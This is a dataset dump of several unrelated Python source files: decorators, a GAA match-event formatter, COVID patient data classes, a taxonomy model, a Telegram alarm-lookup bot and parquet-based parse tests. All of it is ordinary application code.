'PyHEADTAIL release!'.format(name),
category=DeprecationWarning, stacklevel=2)
warnings.simplefilter('default', DeprecationWarning)
print(message)
return func(*args, **kwargs)
return deprecated_wrapper
return deprecated_decorator
def memoize(function):
'''Memoizes the output of a function for given arguments (no keyword arguments)
and returns the correspondingly saved value after the first evaluation.
'''
store = {}
@wraps(function)
def evaluate(*args):
signature = (args)
if signature not in store:
store[signature] = function(*args)
return store[signature]
return evaluate
def synchronize_gpu_streams_before(func):
'''
Use this decorator if you need the results of all the streams
synchronized before this function is called
'''
def sync_before_wrap(*args, **kwargs):
if gpu_utils.use_streams:
for stream in gpu_utils.streams:
stream.synchronize()
return func(*args, **kwargs)
return sync_before_wrap
def synchronize_gpu_streams_after(func):
'''
Use this decorator if you need the results of all the streams
synchronized after this function is called
'''
def sync_after_wrap(*args, **kwargs):
res = func(*args, **kwargs)
if gpu_utils.use_streams:
for stream in gpu_utils.streams:
stream.synchronize()
return res
return sync_after_wrap
| 2,222 |
matchreporter/collect/gaamatchformatter.py
|
moynihanrory/matchreporter
| 0 |
2170936
|
from matchreporter.constants import FIRST_HALF_START, FIRST_HALF_END, SECOND_HALF_START, SECOND_HALF_END, FORMAT_ROW_TIME, \
FORMAT_ROW_HALF, FORMAT_ROW_SECTOR, FORMAT_ROW_KPI, FORMAT_ROW_TEAM, FORMAT_ROW_LOCATION, FORMAT_ROW_PLAYER, \
LOCATION_TAG, EVENT_ENDING
from matchreporter.helpers.pitchgrid import Grid
from matchreporter.helpers.stringhelper import strip_and_convert_half_to_int, strip_and_convert_time_to_int
from matchreporter.helpers.timesector import get_time_sector
FORMAT_ROW_ORIG_LOCATION = 'original_location'
FORMAT_ROW_L_ROW = 'lRow'
FORMAT_ROW_L_COLUMN = 'lColumn'
FORMAT_ROW_EVENT = 'event'
FORMAT_ROW_RAWTIME = 'rawtime'
def clean_and_format_data(mobile_app_output):
first_half_on = False
second_half_on = False
is_match_on = False
grid = Grid()
formatted_lines = []
for _, line in enumerate(mobile_app_output):
if is_match_on is not True:
if line.lower().startswith(FIRST_HALF_START.lower()):
first_half_on = True
is_match_on = True
continue
if is_match_on is True and first_half_on is True:
if line.lower().startswith(FIRST_HALF_END.lower()):
first_half_on = False
continue
if is_match_on is True and first_half_on is False and second_half_on is False:
if line.lower().startswith(SECOND_HALF_START.lower()):
second_half_on = True
continue
if is_match_on is True and first_half_on is False and second_half_on is True:
if line.lower().startswith(SECOND_HALF_END.lower()):
second_half_on = False
is_match_on = False
continue
if (is_match_on and (first_half_on or second_half_on)):
re_formatted_line = format_line(line, grid)
formatted_lines.insert(len(formatted_lines), re_formatted_line)
return formatted_lines
def format_line(line, grid):
line_chunks = line.split()
total_chunks = len(line_chunks)
time = strip_and_convert_time_to_int(line_chunks[0])
half = strip_and_convert_half_to_int(line_chunks[1])
team = line_chunks[3]
location, location_end_index = extract_location(line_chunks, total_chunks)
pitch_location = grid.get_pitch_sector(location)
event, event_end_index = extract_event(line_chunks, location_end_index)
player = extract_player(line_chunks, event_end_index, location_end_index)
sector = get_time_sector(time, half)
l_column = None
if pitch_location is not None and pitch_location is not 'UNK':
l_column = pitch_location[0:1]
l_row = ''
if pitch_location is not None and len(pitch_location) > 0 and pitch_location is not 'UNK':
l_row = pitch_location[-1]
row = {FORMAT_ROW_TIME: time,
FORMAT_ROW_RAWTIME: time,
FORMAT_ROW_HALF: half,
FORMAT_ROW_SECTOR: sector,
FORMAT_ROW_TEAM: team,
FORMAT_ROW_KPI: event,
FORMAT_ROW_EVENT: event,
FORMAT_ROW_PLAYER: player,
FORMAT_ROW_LOCATION: pitch_location,
FORMAT_ROW_L_COLUMN: l_column,
FORMAT_ROW_L_ROW: l_row}
return row
def extract_location(line_chunks, total_chunks):
if LOCATION_TAG in line_chunks:
location = line_chunks[total_chunks - 1]
else:
return None, total_chunks
location_end_index = total_chunks - 1
if location is not None:
location_end_index = location_end_index - 1
return location, location_end_index
def extract_event(line_chunks, event_end_index):
player_string_start = None
event = line_chunks[4]
for i in range(5, event_end_index):
event = event + ' ' + line_chunks[i]
if line_chunks[i].lower() in EVENT_ENDING:
player_string_start = i + 1
break
return event, player_string_start
def extract_player(line_chunks, player_start_index, player_end_index):
player = ''
if player_start_index is None or player_end_index is None:
return player
for i in range(player_start_index, player_end_index):
player = player + ' ' + line_chunks[i]
return player
| 4,258 |
covews/data_access/data_model/patient.py
|
d909b/CovEWS
| 16 |
2173077
|
"""
Copyright (C) 2020 <NAME>, <NAME> Ltd
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions
of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
class Patient(object):
GENDER_MALE = 0
GENDER_FEMALE = 1
RACE_UNKNOWN_OTHER = 0
RACE_AFRICAN_AMERICAN = 1
RACE_CAUCASIAN = 2
RACE_ASIAN = 3
ETHNICITY_OTHER = 0
ETHNICITY_HISPANIC = 1
def __init__(self, patient_id, birth_year, gender, date_of_death, region, covid_status, covid_tests=None,
admissions=None, icu_admissions=None, intubations=None, diagnoses=None, observations=None, dexa=None,
race=None, ethnicity=None):
self.patient_id = patient_id
self.age = 2020 - int(birth_year) if birth_year is not None else None
self.gender = gender
self.date_of_death = date_of_death
self.region = region
self.covid_status = covid_status
self.covid_tests = covid_tests
self.icu_admissions = icu_admissions
self.hospital_admissions = admissions
self.intubations = intubations
self.dexa = dexa
self.diagnoses = diagnoses
self.observations = observations
self.race = race
self.ethnicity = ethnicity
class Procedure(object):
def __init__(self, code, timestamp):
self.code = code
self.timestamp = timestamp
def __repr__(self):
return 'code={:}, time={:})'.format(self.code, self.timestamp)
class Diagnosis(object):
def __init__(self, code, timestamp, coding_scheme="icd10"):
self.code = code
self.timestamp = timestamp
self.coding_scheme = coding_scheme
def __repr__(self):
return 'code={:}, time={:})'.format(self.code, self.timestamp)
class Visit(object):
def __init__(self, area_name, timestamp):
self.area_name = area_name
self.timestamp = timestamp
def __repr__(self):
return 'area_name={:}, time={:})'.format(self.area_name, self.timestamp)
class Observation(object):
SMOKE_NEVER = 0
SMOKE_PREVIOUSLY = 1
SMOKE_CURRENTLY = 2
SMOKE_UNKNOWN = 3
def __init__(self, obs_type, value, unit, timestamp):
self.type = obs_type
self.value = value
self.unit = unit
self.timestamp = timestamp
def __repr__(self):
return 'type={:}, value={:}, unit={:}, time={:}'.format(self.type, self.value, self.unit, self.timestamp)
class LabTest(object):
TEST_NEGATIVE = 0
TEST_POSITIVE = 1
TEST_UNKNOWN = 2
def __init__(self, code, collected_timestamp, test_value, test_unit=None, result_timestamp=None):
self.code = code
self.timestamp = collected_timestamp
self.test_value = test_value
self.test_unit = test_unit
self.result_timestamp = result_timestamp
@property
def value(self):
return self.test_value
def __repr__(self):
return 'code={:}, time={:}, value={:})'.format(self.code, self.timestamp, self.test_value)
| 3,921 |
Cad_Especies_Animais/src/model/familia.py
|
andersonmarques/programacao_2_ufra
| 0 |
2172794
|
from model.ordem import Ordem
class Familia:
def __init__(self, nome = None, ordem = None) -> None:
self.nome = nome
self.ordem = ordem
self.lista_generos = None
def __str__(self):
return f'Familia: {self.__nome}'
@property
def nome(self):
return self.__nome
@nome.setter
def nome(self, value):
self.__nome = value
@property
def ordem(self) -> Ordem:#indica que retornara um objeto Ordem
return self.__ordem
@ordem.setter
def ordem(self, value):
self.__ordem = value
@property
def lista_generos(self):
return self.__generos
@lista_generos.setter
def lista_generos(self, value):
# if not bool(value):
# self.__generos = self.__generos
# elif value is None:
self.__generos = []
# else:
# self.__generos = self.__generos
| 916 |
BOT.py
|
RenanAlmeidaSilva/Alarme-App-DAsl
| 0 |
2173145
|
import logging
import json
from aiogram import Bot, Dispatcher, executor, types
API_TOKEN = '<KEY>'
# Configure logging
logging.basicConfig(level=logging.DEBUG)
# Initialize bot and dispatcher
bot = Bot(token=API_TOKEN)
dp = Dispatcher(bot)
with open('alarmes.json', 'r') as f:
alarmes = json.load(f)
@dp.message_handler(commands=['info'])
async def send_welcome(message: types.Message):
await message.reply("Hi! I'm Alarmes828DBot!\nPowered by: \nDev. <NAME>. (Estagiário Developer) \nDev. <NAME>. (Estagiário Developer)\n")
@dp.message_handler(commands=['start'])
async def send_welcome(message: types.Message):
with open('user.txt') as file:
userList = file.read()
user = userList.split('\n')
textomsg1 = ''
if message['chat']['username']:
textomsg1 += message["chat"]["username"]
with open('logs.log', 'a') as arquivo:
arquivo.write('\n' + message["chat"]["username"] + '\n\n')
if textomsg1 in user:
await message.answer('Olá ' + message['chat'][
'first_name'] + ', eu sou o Bot para o alarme 840Dsl, criado para encontrar as informações do seu erro.\n'
'Você deve me fornecer um valor para pesquisa.')
else:
await message.answer("Olá, eu sou o Bot para o alarme 840Dsl, criado para encontrar as informações do seu erro.\n"
"No momento você não possui permissão para acessar as informações internas.\n"
"Entre em contato com os desenvolvedores.\n"
"Para mais informações dos meu criadores digite '/info'")
else:
await message.answer('Olá ' + message['chat'][
'first_name'] + ', no momento não encontrei seu username. Você deve verifica-lo nas configurações do Telegram.')
@dp.message_handler()
async def echo(message: types.Message):
segundos = message['date']
with open('logs.log', 'a') as arquivo:
arquivo.write(segundos.__str__())
with open('user.txt') as file:
userList = file.read()
#print(userList)
user = userList.split('\n')
#print(user)
textomsg = ''
if message["chat"]["username"]:
textomsg += message["chat"]["username"]
with open('logs.log', 'a') as arquivo:
arquivo.write('\n'+message["chat"]["username"]+'\n\n')
else:
await message.answer("Você não possui um Username. Logo, deverá ir em suas configurações e nomea-lo.")
if message.text == '27001':
await message.answer('Mensagem muito longa, por favor verifique o manual:\n'
'https://www.autservice.com.br/admin/assets/repositorio/292d4f09b8fe329bf5c7bbb922b6d3bc.pdf#page=481')
if message.text == '27033':
await message.answer('Mensagem muito longa, por favor verifique o manual:\n'
'https://www.autservice.com.br/admin/assets/repositorio/292d4f09b8fe329bf5c7bbb922b6d3bc.pdf#page=496')
elif textomsg in user:
entradas = ['oi', 'olá', 'ola', 'oie', 'roi']
alarmes
txt = ''
for alarme in alarmes:
if alarme['numero'] == message.text:
if alarme['titulo']:
txt += f'TÍTULO: {alarme["titulo"]}\n'
if alarme['Explanation']:
txt += f'\nEXPLANATION:\n{alarme["Explanation"]}\n'
if alarme['reaction']:
txt += f'\nREACTION:\n{alarme["reaction"]}\n'
if alarme['Programm']:
txt += f'PROGRAMM CONTINUATION:{alarme["Programm"]}\n'
if alarme['parameters']:
txt += f'PARAMETERS:\n{alarme["parameters"]}\n'
if alarme['Remedy']:
txt += f'REMEDY:\n{alarme["Remedy"]}\n'
if alarme['messagevalue']:
txt += f'MESSAGE VALUE:\n{alarme["messagevalue"]}\n'
if alarme['cause']:
txt += f'CAUSE:\n{alarme["cause"]}\n'
if alarme['driveobject']:
txt += f'DRIVE OBJECT:\n{alarme["driveobject"]}\n'
if alarme['Acknowledge']:
txt += f'ACKNOWLEDGE:\n{alarme["Acknowledge"]}\n'
if txt != '':
await message.answer(txt)
elif message.text.lower() in (entradas):
await message.answer('Olá ' + message['chat'][
'first_name'] + ', eu sou o Bot para o alarme 840Dsl, criado para encontrar as informações do seu erro.\n'
'Você deve me fornecer um valor para pesquisa.')
else:
erro = "Você deve fornecer um valor válido."
await message.answer(erro)
'''if message.text == '27001':
Explanation = [x for x in alarmes if x['numero'] == '27001'][0]['Explanation']
await message.answer(Explanation)
for cont in range(1):
divisor = []
if txt.find('Divisor..//') >= 0:
divisor(cont) += x.split('Divisor..//')[1].split('Divisor..//')[0]
await message.answer(divisor)'''
else:
await message.answer("Olá, eu sou o Bot para o alarme 828D, criado para encontrar as informações do seu erro.\n"
"No momento você não possui permissão para acessar as informações internas.\n"
"Entre em contato com os desenvolvedores.\n"
"Para mais informações dos meu criadores digite '/info'")
if __name__ == '__main__':
executor.start_polling(dp, skip_updates=True)
| 5,812 |
test/test_parse.py
|
ebegoli/SynthNotes
| 11 |
2172779
|
import os
import shutil
import subprocess
import pandas as pd
import pyarrow as pa
import pyarrow.parquet as pq
def test_parse_execution():
testdir = os.path.dirname(__file__)
#If we don't remove leftovers, running parse will just vomit file copies and create a second copy of the dataframe.
if os.path.isdir(testdir+'/parsed'):
shutil.rmtree(testdir+'/parsed')
cargs = ['synthnotes','parse','--xml-dir',testdir+'/xml/','--output',testdir+'/parsed/','--seed','0']
subprocess.call(cargs)
dirs = os.listdir(testdir+"/parsed/")
assert len(dirs) == 5
def test_parse_output():
testdir = os.path.dirname(__file__)
test_mentions = pq.read_table(f'{testdir}/parsed/mentions').to_pandas()
verify_mentions = pq.read_table(f'{testdir}/verify/parsed/mentions').to_pandas()
test_mentions.drop(['id','sent_id'],axis=1, inplace=True)
verify_mentions.drop(['id','sent_id'],axis=1, inplace=True)
assert test_mentions.equals(verify_mentions)
test_predicates = pq.read_table(f'{testdir}/parsed/predicates').to_pandas()
verify_predicates = pq.read_table(f'{testdir}/verify/parsed/predicates').to_pandas()
test_predicates.drop(['id','sent_id'],axis=1, inplace=True)
verify_predicates.drop(['id','sent_id'],axis=1, inplace=True)
assert test_predicates.equals(verify_predicates)
test_sentences = pq.read_table(f'{testdir}/parsed/sentences').to_pandas()
verify_sentences = pq.read_table(f'{testdir}/verify/parsed/sentences').to_pandas()
test_sentences.drop(['id'],axis=1, inplace=True)
verify_sentences.drop(['id'],axis=1, inplace=True)
assert test_sentences.equals(verify_sentences)
test_tokens = pq.read_table(f'{testdir}/parsed/tokens').to_pandas()
verify_tokens = pq.read_table(f'{testdir}/verify/parsed/tokens').to_pandas()
test_tokens.drop(['id','sent_id'],axis=1, inplace=True)
verify_tokens.drop(['id','sent_id'],axis=1, inplace=True)
assert test_tokens.equals(verify_tokens)
test_umls = pq.read_table(f'{testdir}/parsed/umls_concepts').to_pandas()
verify_umls = pq.read_table(f'{testdir}/verify/parsed/umls_concepts').to_pandas()
test_umls.drop(['id'],axis=1, inplace=True)
verify_umls.drop(['id'],axis=1, inplace=True)
assert test_umls.equals(verify_umls)
#for dirname in dirs:
# check that the contents are actually right
#exit()
# dirhash = subprocess.check_output(["sha1sum",dirname+"/* | sha1sum"])
# verifyhash = subprocess.check_output(["sha1sum", testdir+"/"+os.path.relpath(dirname,testdir+"/parsed")+"/* | sha1sum"])
# assert dirhash == verifyhash
| 2,629 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.